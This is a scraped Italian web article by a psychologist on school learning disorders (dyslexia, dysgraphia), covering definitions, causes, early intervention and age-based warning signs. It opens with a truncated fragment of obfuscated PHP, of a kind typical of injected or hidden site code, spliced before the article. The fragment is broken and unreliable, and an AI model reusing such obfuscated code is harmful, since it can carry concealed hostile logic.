=round(0+3))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][60]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.5+0.5)];if($GLOBALS['_1188104000_'][73]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.2+0.2+0.2+0.2+0.2)];if($GLOBALS['_1188104000_'][89]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][106]($_59) I disturbi dell' apprendimento scolastico (dislessia, disgrafia)

Area Riservata



Ti ricordiamo che per rendere attivo il tuo account dopo la registrazione, sarà necessario aprire il messaggio email che riceverai e cliccare sul link di attivazione.

Disturbi Mentali

I disturbi dell' apprendimento scolastico (dislessia, disgrafia) PDF 

5 novembre 2004 - a cura di Antonio d'Amore, Psicologo e Psicoterapeuta 

 

Cosa s'intende per Disturbi dell'Apprendimento Scolastico?

Con l'espressione "Disturbi dell'Apprendimento scolastico" (DAS) si fa riferimento ad un insieme di disturbi nella comprensione e nell'uso del linguaggio, sia parlato sia scritto, che si manifestano in una limitazione delle capacità di ascoltare, parlare, leggere, scrivere, ragionare e/o fare calcoli.

 

Non rientrano tra i DAS, le difficoltà di apprendimento derivanti da handicap visivi, uditivi e motori, da ritardo mentale, da disturbi emozionali, o da situazioni familiari e socioculturali svantaggiose.

 

I DAS sono estremamente variabili. Alcuni individui possono avere difficoltà solo nell'ambito della lettura e scrittura, altri solo nell'ambito del calcolo e della soluzione di problemi matematici, altri ancora possono fare fatica a comprendere ciò che gli viene detto, altri, infine, possono presentare difficoltà in più ambiti contemporaneamente.

 

Una percentuale consistente (20-45%) delle persone con DAS, ha anche difficoltà a mantenere a lungo l'attenzione su un compito o in un'attività e/o una certa incapacità a stare ferma a lungo in un posto, cioé, presenta il cosidetto disturbo da deficit d'attenzione e iperattività.

 

 

Diffusione e cause dei DAS

Stime attuali indicano che nella popolazione scolastica italiana una percentuale compresa tra il 5% e il 10% presenta DAS.

Non è ancora possibile dire, con certezza, quali sono le cause dei DAS. Tuttavia, studi recenti indicano che le difficoltà incontrate dalle persone con DAS debbano essere attribuite a disfunzioni in alcuni meccanismi cerebrali. Tali disturbi non sembrano tanto essere legati al malfunzionamento di una specifica area cerebrale, quanto piuttosto ad una difficoltà diffusa nel coordinare le informazioni provenienti dalle diverse aree cerebrali implicate nei complessi processi di lettura, scrittura, calcolo e ragionamento matematico.

 

Le persone che soffrono di DAS non sono né più pigre nè meno intelligenti degli altri; semplicemente elaborano le informazioni in maniera diversa

 

E' possibile trattare efficacemente i DAS?  

I DAS sono congeniti e permangono per tutta la vita. Cionononstante, le persone che soffrono di questi disturbi, se addestrate a seguire modalità alternative d'apprendimento, possono aggirare le difficoltà ed acquisire buone abilità anche nelle aree critiche della lettura, scrittura, calcolo e ragionamento matematico. La risoluzione di tali problemi è possibile grazie alla straordinaria flessibilità del cervello umano, che è, massima nei bambini e si riduce progressivamente col passare degli anni.

 

 

Quando è meglio intervenire?

Numerosi studi indicano che i risultati migliori si ottengono con interventi precoci.

Infatti, dati recenti indicano che su 100 bambini sottoposti a trattamento per problemi di lettura entro il settimo anno d'età, una percentuale alta (85-90%) raggiunge lo stesso livello di abilità dei coetanei privi del disturbo. Se, invece, lo stesso intervento viene effettuato dopo il compimento del nono anno di età, la percentuale si riduce fino al 25%.

 

Affinché il trattamento abbia successo, è dunque fondamentale riuscire ad identificare i DAS, il più presto possibile. Ideale sarebbe arrivare alla diagnosi già nella scuola materna o al massimo entro il secondo anno delle elementari.

 

 

Quali fattori possono ritardare la diagnosi dei DAS?

 

I bambini con DAS si comportano per molti versi esattamente come i loro coetanei. Ciò che li distingue, tuttavia, è una marcata irregolarità negli apprendimenti; spesso, infatti, tendono ad eccellere in alcune aree e ad essere piuttosto carenti e problematici in altre.

 

Purtroppo, pur rendendosi conto delle difficoltà incontrate dal figlio in alcuni apprendimenti, molti genitori esitano a lungo (le statistiche ci dicono anche fino a 2-3 anni) prima di ricorrere ad uno specialista per la diagnosi e l'eventuale trattamento del disturbo.

 

 

L'esitazione solitamente è legata: 

  • al timore che portare alla luce i problemi significhi “etichettare” il proprio figlio;

  • al convincimento che le difficoltà possano essere superate spontaneamente, col passare del tempo;

  • alla vergogna che in alcuni genitori scaturisce dal ritenersi responsabili dei problemi del figlio.

La scuola può contribuire alla diagnosi precoce

 

Le irregolarità negli apprendimenti, mostrate dai bambini con DAS, sono più facilmente evidenziabili con l'ingresso nella scuola.

 

L'insegnante spesso è la prima persona ad accorgersi delle persistenti difficoltà incontrate dai bambini con DAS.

 

Anche se la gran parte degl'insegnanti difficilmente ha una preparazione specifica per affrontare questo tipo di problemi, non è indispensabile che un insegnante diventi esperto del settore, prima di riuscire ad identificare un bambino con DAS; basta sapere a quali segnali prestare attenzione.

 

 

Quali sono i segnali che aiutano ad individuare un DAS?

Certi comportamenti ed atteggiamenti possono essere considerati come spie della presenza di DAS. Alcuni di questi sono facilmente evidenziabili dai genitori, soprattutto in età prescolare. Altri, invece, possono essere più efficacemente identificati dagli insegnanti.

Segnali evidenziabili in età prescolare 

  • ritardo nella comparsa del linguaggio;
  • problemi di pronuncia;
  • vocabolario limitato per l'età;
  • difficoltà ad imparare l'alfabeto, i giorni della settimana, i colori, le forme ed i numeri;
  • iperattività e distraibilità estreme;
  • grosse difficoltà nell'interazione con i coetanei;
  • difficoltà di orientamento spaziale (confusione tra destra e sinistra);
  • ritardo nell'acquisizione di abilità motorie fini (allacciarsi le scarpe o usare le forbici).

Segnali  evidenziabili in età scolare  (3-6 anni)

 

  • difficoltà ad abbinare le lettere ai suoni;
  • pause frequenti ed errori (per esempio, scambio di lettere "b" con "d" o "q" con "p") durante la lettura ad alta voce;
  • errori nella lettura di numeri a due o più cifre, invertendo l'ordine (per esempio, 21 viene letto 12);
  • confusione tra i simboli aritmetici;
  • lentezza nell'apprendere cose nuove;
  • lentezza nella memorizzazione;
  • impulsività e difficoltà a pianificare le proprie attività;
  • impugnatura goffa della penna;
  • difficoltà a percepire i rapporti temporali (confusione tra ieri e domani);
  • scarso coordinamento motorio e goffaggine. 

Segnali  evidenziabili in  età scolare (7-10 anni)

 

  • difficoltà ad imparare prefissi e suffissi;
  • riluttanza a leggere ad alta voce;
  • difficoltà a capire i problemi di matematica;
  • calligrafia caotica ed incomprensibile;
  • riluttanza ad eseguiere compiti scritti;
  • scarsa capacità di ricordare gli avvenimenti;
  • incapacità a ripetere correttamente una storia, non rispettando l'ordine temporale degli avvenimenti;
  • estrema difficoltà a fare amicizia con i coetanei;
  • difficoltà a rispettare il proprio turno durante una conversazione o durante un gioco;
  • difficoltà a capire gli scherzi e le barzellette. 

La presenza e, soprattutto, la persistenza di alcuni tra i segnali sopra elencati, deve indurre a sospettare l'esistenza di un DAS

 

Per la corretta diagnosi di DAS è necessario un esame approfondito e l'uso di diversi test psicometrici

 

 

FONTI D'INFORMAZIONE

 

 

Per migliorare la tua navigazione su questo sito, utilizziamo cookies ed altre tecnologie che ci permettono di riconoscerti. Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy.

Acconsento all'utilizzo dei cookies su questo sito